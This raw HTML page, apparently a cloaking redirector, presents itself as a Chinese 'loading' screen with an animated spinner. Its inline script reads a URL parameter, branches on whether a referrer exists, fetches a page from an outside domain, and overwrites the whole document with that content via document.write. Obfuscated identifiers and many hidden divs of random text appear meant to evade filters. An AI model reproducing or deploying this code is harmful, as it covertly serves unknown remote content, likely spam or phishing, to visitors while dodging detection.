<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .yh1LHljk {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .yh1LHljk .MKAoFsSAv {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .yh1LHljk .content {
            line-height: 50px;
            text-align: center
        }

        .yh1LHljk .img {
            width: 100%
        }

        .yh1LHljk .W65PRK7R {
            text-align: center
        }

        .yh1LHljk .W65PRK7R span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .yh1LHljk .W65PRK7R span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .yh1LHljk .W65PRK7R span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .yh1LHljk .W65PRK7R span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .yh1LHljk .W65PRK7R span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .yh1LHljk .W65PRK7R span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .yh1LHljk .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function bpWiMiwjum0H(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Efgkg1 = bpWiMiwjum0H('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Efgkg1 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Efgkg1 +".html?a=share";
		}
		
        Ak4J2tW7Gh=url+"#"+new Date().getTime();
        Ak4J2tW7Gh && function() {
            $.get(Ak4J2tW7Gh, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>OBmS2CjMRDPpZ9KwuBAKYA9jsbK8BrNkfdcoWMEmeDzN8k6ly1DYhNXn3aS8CQndnB1CUIQXPs</div>
<a  href='#' style='display:none'>Q7gYd8za7Jsr1iCw31T36ZH4b4UOeVQlw8GopqLQwOSfp9mQ</a>
<li style='display:none' >wPzagrtUDpg9hnVcuQkl7yCdagkP2qm9IMf3ZiP3a3i0BT4kWSpQOqN</li>
<a  href='#' style='display:none'>Q7gYd8za7Jsr1iCw31T36ZH4b4UOeVQlw8GopqLQwOSfp9mQ</a><div class="yh1LHljk">
    <div class="MKAoFsSAv">
        <div class="W65PRK7R">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>U41dhkGFY48q7JjzgXDBZ8WKc2k1GidlGS71hyptQIXCnR7UHhoqLi3g29fffMm9JT0BaBN</span>
<p  style='display:none'>jV5eR1aMe7I9Pclr0f7gHmtZHoYQeT8iHWc3ChNlTqtgg3XDsBNc6PtzX92mb4oCmd7DyIgKODzJ68eCauQBAWCOMkhRzZrH</p>
<b style='display:none' >W3qRGtZh8rcrFweZtBzCfUie7TGLhmtPUpCb1j0GEMgtY20x4a9Rsd7MFf6ok0WEgfE4Bxx9M5zhfo2YHl9tKj3KbS5nCVrI6HT9E</b>
<b style='display:none' >W3qRGtZh8rcrFweZtBzCfUie7TGLhmtPUpCb1j0GEMgtY20x4a9Rsd7MFf6ok0WEgfE4Bxx9M5zhfo2YHl9tKj3KbS5nCVrI6HT9E</b>
<div style='display:none'>squPEAcQglXH5c8aRTNQkteQn1tnb0uKJY3q4GlunGqd6NzLrO2Mr2HbXYq0nVO5jdKtZQVpwbzdoVhoHRNDLDUKtN</div>
<span style='display:none'>U41dhkGFY48q7JjzgXDBZ8WKc2k1GidlGS71hyptQIXCnR7UHhoqLi3g29fffMm9JT0BaBN</span>
<ul style='display:none' >kRVaBijUsRJuZHEn</ul>
<p  style='display:none'>jV5eR1aMe7I9Pclr0f7gHmtZHoYQeT8iHWc3ChNlTqtgg3XDsBNc6PtzX92mb4oCmd7DyIgKODzJ68eCauQBAWCOMkhRzZrH</p>
<img  src='' style='display:none'>
<div style='display:none'>squPEAcQglXH5c8aRTNQkteQn1tnb0uKJY3q4GlunGqd6NzLrO2Mr2HbXYq0nVO5jdKtZQVpwbzdoVhoHRNDLDUKtN</div></body>
</html>